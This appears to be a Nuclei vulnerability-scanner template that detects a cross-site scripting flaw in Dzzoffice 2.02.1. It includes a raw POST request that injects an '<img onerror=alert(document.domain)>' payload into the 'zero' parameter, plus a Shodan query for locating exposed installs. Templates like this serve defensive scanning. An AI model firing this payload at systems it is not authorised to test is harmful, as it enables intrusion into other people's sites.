46 lines
1.3 KiB
YAML
46 lines
1.3 KiB
YAML
id: dzzoffice-xss
|
|
|
|
info:
|
|
name: Dzzoffice 2.02.1 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: high
|
|
description: |
|
|
Dzzoffice 2.02.1_SC_UTF8 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the zero parameter.
|
|
reference:
|
|
- https://github.com/zyx0814/dzzoffice/issues/183
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: http.html:"dzzoffice"
|
|
tags: dzzoffice,xss
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /index.php?mod=system&op=orgtree&do=orgtree HTTP/1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
id=%23&nouser=0&moderator=0&zero=<img+src=x+onerror=alert(document.domain)>&stype=0&range=0&showjob=0
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '"text":"<img src=x onerror=alert(document.domain)>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a004730450221009a4338aa8117bfe775151f3c22303cae98bc0bf45dfe1669de141c84551998ec02204d043bda52ad6db578d8409a2aadf83c5f270f6ff309c4fad7a5f499f54a16f6:922c64590222798bb761d5b6d8e72950
|